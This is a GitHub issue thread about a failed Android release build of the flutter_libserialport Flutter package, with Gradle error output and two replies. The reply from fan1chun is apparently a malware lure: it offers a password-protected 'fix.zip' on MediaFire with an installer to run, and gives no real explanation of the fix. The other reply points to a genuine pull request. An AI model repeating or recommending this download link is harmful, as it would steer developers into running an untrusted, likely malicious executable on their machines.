jpnurmi/flutter_libserialport #115: error: resource android:attr/lStar not found.

zoenie123, 2024-08-29:
Since upgrade from flutter version 3.19.6 to a higher version I cannot compile flutter_libserialport anymore.

`FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':flutter_libserialport:verifyReleaseResources'.
> A failure occurred while executing com.android.build.gradle.tasks.VerifyLibraryResourcesTask$Action
   > Android resource linking failed
     ERROR:Q:\flutter_projects\flutter_bloc_example\build\flutter_libserialport\intermediates\merged_res\release\values\values.xml:194: AAPT: error: resource android:attr/lStar not found.

* Try:
> Run with --stacktrace option to get the stack trace.
> Run with --info or --debug option to get more log output.
> Run with --scan to get full insights.

* Get more help at https://help.gradle.org

BUILD FAILED in 1m 23s
Running Gradle task 'assembleRelease'...                           84.1s

┌─ Flutter Fix ──────────────────────────────────────────────────────────────────────────────────────────┐
│ [!] Your project requires a newer version of the Kotlin Gradle plugin.                                 │
│ Find the latest version on https://kotlinlang.org/docs/releases.html#release-details, then update the  │
│ version number of the plugin with id "org.jetbrains.kotlin.android" in the plugins block of            │
│ Q:\flutter_projects\flutter_bloc_example\android\settings.gradle.                                      │
│                                                                                                        │
│ Alternatively (if your project was created before Flutter 3.19), update                                │
│ Q:\flutter_projects\flutter_bloc_example\android\build.gradle                                          │
│ ext.kotlin_version = '<latest-version>'                                                                │
└────────────────────────────────────────────────────────────────────────────────────────────────────────┘
Gradle task assembleRelease failed with exit code 1
`

Does the package need an update to support the latest gradle version?

fan1chun, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

BaurFilip, 2024-09-03:
Hi zoenie123, try the branch from the PR **#109 Add namespace**. Works for me :-)